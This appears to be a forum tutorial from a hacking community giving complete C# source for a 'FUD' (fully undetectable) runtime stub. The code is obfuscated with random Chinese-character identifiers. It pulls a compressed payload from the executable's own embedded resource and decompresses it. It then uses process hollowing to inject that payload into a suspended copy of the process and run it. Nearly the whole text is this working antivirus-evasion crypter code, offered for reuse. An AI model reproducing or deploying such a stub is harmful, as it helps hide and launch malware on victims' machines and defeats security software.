How to make a FUD Runtime Stub (Level: Beginner) How to make a FUD Runtime Stub (Level: Beginner)
This Stub is for
https://leakforums.net/thread-468643
we need 3 class
class1
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class 的伐式年谢达非答方外非肉非达说种自天文文十
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool 英余式文伪答(string 仿伏余式方中, StringBuilder 涯么伙信表文, IntPtr 谢份表十非的, IntPtr 谢涯谢伙华达, [MarshalAs(UnmanagedType.Bool)]
bool inherit, int creation, IntPtr env, string 方丢伪达种种, byte[] 信伏谢涯十华, IntPtr[] 么问种达信天);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool V9(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
private static extern uint 英余式文伪答0(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool 英余式文伪答1(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint 英余式文伪答2(IntPtr hThread);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool 英余式文伪答3(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern IntPtr 英余式文伪答4(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool 英余式文伪答5(IntPtr hProcess, IntPtr guyfjhkKJLHKLK, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool 英余式文伪答6(IntPtr hProcess, IntPtr 仿伏余式方中1, byte[] lpBuffer, uint nSize, int 仿伏余式方中2);
public static bool 肉方表文文伏伙文余文英仿常价仿(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr 谢份表十非的 = IntPtr.Zero;
IntPtr[] 英余式文伪答7 = new IntPtr[4];
byte[] 英余式文伪答8 = new byte[68];
int num2 = BitConverter.ToInt32(bytes, 60);
int num = BitConverter.ToInt16(bytes, num2 + 6);
IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
if (英余式文伪答(null, new StringBuilder(surrogateProcess), 谢份表十非的, 谢份表十非的, false, 4, 谢份表十非的, null, 英余式文伪答8, 英余式文伪答7))
{
uint[] ctxt = new uint[179];
ctxt[0] = 0x10002;
if (V9(英余式文伪答7[1], ctxt))
{
IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
IntPtr 英余式文伪答9 = IntPtr.Zero;
IntPtr 仿伏余式方中0 = new IntPtr(4);
IntPtr numRead = IntPtr.Zero;
if (英余式文伪答1(英余式文伪答7[0], baseAddr, ref 英余式文伪答9, Convert.ToInt32(仿伏余式方中0), ref numRead) && (英余式文伪答0(英余式文伪答7[0], 英余式文伪答9) == 0))
{
IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
IntPtr 仿伏余式方中1 = 英余式文伪答4(英余式文伪答7[0], addr, size, 0x3000, 0x40);
int 仿伏余式方中2 = 0;
英余式文伪答6(英余式文伪答7[0], 仿伏余式方中1, bytes, Convert.ToUInt32(Convert.ToInt32(ptr4)), 仿伏余式方中2);
int num5 = num - 1;
for (int i = 0; i <= num5; i++)
{
int[] dst = new int[10];
Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
byte[] buffer2 = new byte[(dst[4] - 1) + 1];
Buffer.BlockCopy(bytes, dst[5], buffer2, 0, buffer2.Length);
size = new IntPtr(仿伏余式方中1.ToInt32() + dst[3]);
addr = new IntPtr(buffer2.Length);
英余式文伪答6(英余式文伪答7[0], size, buffer2, Convert.ToUInt32(addr), 仿伏余式方中2);
}
size = new IntPtr(ctxt[0x29] + 8L);
addr = new IntPtr(4);
英余式文伪答6(英余式文伪答7[0], size, BitConverter.GetBytes(仿伏余式方中1.ToInt32()), Convert.ToUInt32(addr), 仿伏余式方中2);
ctxt[0x2c] = Convert.ToUInt32(仿伏余式方中1.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
英余式文伪答3(英余式文伪答7[1], ctxt);
}
}
英余式文伪答2(英余式文伪答7[1]);
}
}
catch
{
return false;
}
return true;
}
}
class2
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
static class 方华达么问丢先问的价问
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr 谢谢天自非常文种传文传怎传非仿, string 伟怎余方非伏种常答常谢自伟怎余方非, string 种常答常谢自伟怎余方非伟怎余方非伏伟怎余方非伏);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern IntPtr 达表答伪的天道英文天方种表达份(string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern int SizeofResource(IntPtr 谢谢天自非常文种传文传怎传非仿, IntPtr hResInfo);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
private static extern IntPtr LoadResource(IntPtr 谢谢天自非常文种传文传怎传非仿, IntPtr hResInfo);
public static byte[] 文的价传先方延信的方么(string 谢表的书伏说信余用非余余外自频)
{
IntPtr 谢谢天自非常文种传文传怎传非仿 = 达表答伪的天道英文天方种表达份(谢表的书伏说信余用非余余外自频);
IntPtr 答外信伟表余华道价达英 = FindResource(谢谢天自非常文种传文传怎传非仿, "Sweden", "Nykoping");
IntPtr 伐么先种谢仿式谢外信 = LoadResource(谢谢天自非常文种传文传怎传非仿, 答外信伟表余华道价达英);
dynamic 说非先十么谢余谢书仿涯伪种的非文外仿非自 = SizeofResource(谢谢天自非常文种传文传怎传非仿, 答外信伟表余华道价达英);
byte[] 英余延种中式表中仿 = new byte[说非先十么谢余谢书仿涯伪种的非文外仿非自];
Marshal.Copy(伐么先种谢仿式谢外信, 英余延种中式表中仿, 0, Convert.ToInt32(说非先十么谢余谢书仿涯伪种的非文外仿非自));
return 英余延种中式表中仿;
}
}
class3
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.IO.Compression;
using System.IO;
public class Compression
{
public static byte[] Compress(byte[] bytData)
{
using (MemoryStream oMS = new MemoryStream())
{
//GZip object that compress the file
using (GZipStream oGZipStream = new GZipStream(oMS, CompressionMode.Compress))
{
//Write to the Stream object from the buffer
oGZipStream.Write(bytData, 0, bytData.Length);
oGZipStream.Close();
bytData = new byte[oMS.ToArray().Length];
bytData = oMS.ToArray();
}
oMS.Close();
}
return bytData;
}
public static byte[] Decompress(byte[] bytData)
{
using (MemoryStream oMS = new MemoryStream(bytData))
{
using (GZipStream oGZipStream = new GZipStream(oMS, CompressionMode.Decompress))
{
const int CHUNK = 1024;
int intTotalBytesRead = 0;
do
{
// Enlarge the buffer.
Array.Resize(ref bytData, intTotalBytesRead + CHUNK);
// Read the next chunk.
int intBytesRead = oGZipStream.Read(bytData, intTotalBytesRead, CHUNK);
intTotalBytesRead += intBytesRead;
// See if we're done.
if (intBytesRead < CHUNK)
{
// We're done. Make the buffer fit the data.
Array.Resize(ref bytData, intTotalBytesRead);
break; // TODO: might not be correct. Was : Exit Do
}
} while (true);
oGZipStream.Close();
}
oMS.Close();
}
return bytData;
}
}
Program
byte[] dbytes = null;
Hej = 方华达么问丢先问的价问.文的价传先方延信的方么(Application.ExecutablePath);
dbytes = Compression.Decompress(Hej);
的伐式年谢达非答方外非肉非达说种自天文文十.肉方表文文伏伙文余文英仿常价仿(dbytes, Application.ExecutablePath);